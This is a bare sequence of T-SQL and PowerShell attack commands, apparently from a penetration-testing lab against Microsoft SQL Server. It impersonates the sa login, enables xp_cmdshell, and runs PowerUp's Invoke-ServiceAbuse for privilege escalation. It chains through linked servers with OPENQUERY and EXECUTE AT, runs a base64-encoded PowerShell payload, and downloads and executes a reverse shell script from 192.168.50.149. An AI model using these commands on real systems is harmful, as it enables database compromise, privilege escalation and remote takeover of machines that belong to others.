EXECUTE as LOGIN = 'dbuser'; EXECUTE as LOGIN = 'sa'; 
Select is_srvRolemember('sysadmin'); 
EXEC sp_configure 'show advanced options',1; 
EXEC sp_configure 'xp_cmdshell',1; 
RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'xcopy \\PA-USER149\shared\PowerUp.ps1 C:\Users\MSSQLSERVER\Documents';
EXEC master..xp_cmdshell 'powershell . C:\Users\MSSQLSERVER\Documents\PowerUp.ps1; Invoke-ServiceAbuse -Name ''ALG'' -Username USFUN\pastudent149';
SELECT * FROM OPENQUERY("ufc-db1", 'Select IS_SRVROLEMEMBER(''sysadmin'');');
SELECT * FROM master..sysservers;
SELECT * FROM OPENQUERY("UFC-DB1", 'select * from openquery("UFC-DBPROD", ''select * from master..sysservers'')');
SELECT * FROM OPENQUERY("UFC-DB1", 'select * from openquery("UFC-DBPROD", ''select system_user;'')');
SELECT * FROM OPENQUERY("UFC-DB1", 'select * from openquery("UFC-DBPROD", ''execute as login = 'sa'; '')');
SELECT * FROM OPENQUERY("UFC-DB1", 'select system_user;');
SELECT * FROM OPENQUERY("UFC-DB1", 'Select IS_SRVROLEMEMBER(''sysadmin'');');
SELECT * FROM OPENQUERY("UFC-DB1", 'exec sp_configure ''show_advanced_options'',1;');
SELECT * FROM OPENQUERY("UFC-DB1", 'exec master..xp_cmdshell ''whoami'';');
EXECUTE('sp_configure','show_advanced_options',',1') at "UFC-DB1";
EXECUTE('sp_configure','xp_cmdshell',',1') at "UFC-DB1";
EXECUTE('reconfigure') at "UFC-DB1";
EXECUTE('exec master..xp_cmdshell "powershell whoami /all"') AT "ufc-db1";
EXECUTE('exec master..xp_cmdshell "powershell icacls C:\Users\dbservice\Documents"') AT "ufc-db1";
EXECUTE('exec master..xp_cmdshell "xcopy \\192.168.50.149\shared\PowerUp.ps1 C:\Users\dbservice"') AT "UFC-DB1";
EXECUTE('exec master..xp_cmdshell "powershell -e TZFNa8JAEIbvgv9hDmmzS82SqJFqqNCGtghFpRF6EA9rMpjUGMWMqKj/vdl81dMOy/vxzG6zoflxhAnBC4zxaEyWv+gTeOeUcCPGSMLb+mukVMzcqZsrmW7128LqPQvbFFa3r7e63Q53tJT2KDdZTpkoPpG8/I5xZ748E84XC02daSYyhejZdse+PlzMm3MMoxgZ0yJlL4LEN8qAFfoWmC0oRvGFyYpCzsFIEEx+cbRAksx87I7fmJ13OJYbrDaZ4YnEq+eORu+Jvw2iZMVLvmysWlRJpDbBJFhKf61CIzxB0dAePlpwhcmBjMIGd9I25OSV8Qn0qQd6drLdMeBiKilUl0PQS09WqOLnpMCwZFoMBjljzvammNh/Q/3E4mcfEbI6J+Ou5+p5au1HfEhDxm9O9StuvE2R8Waj2fgD"') AT "UFC-DB1";
EXECUTE('exec master..xp_cmdshell "ping -n 2 UFC-SQLDev"') AT "ufc-db1";
EXECUTE('exec master..xp_cmdshell "powershell iex((New-Object Net.WebClient).DownloadString(''http://192.168.50.149/RevShell.ps1''))"') AT "UFC-DB1";
EXECUTE('exec master..xp_cmdshell "powershell get-service"') AT "UFC-DB1";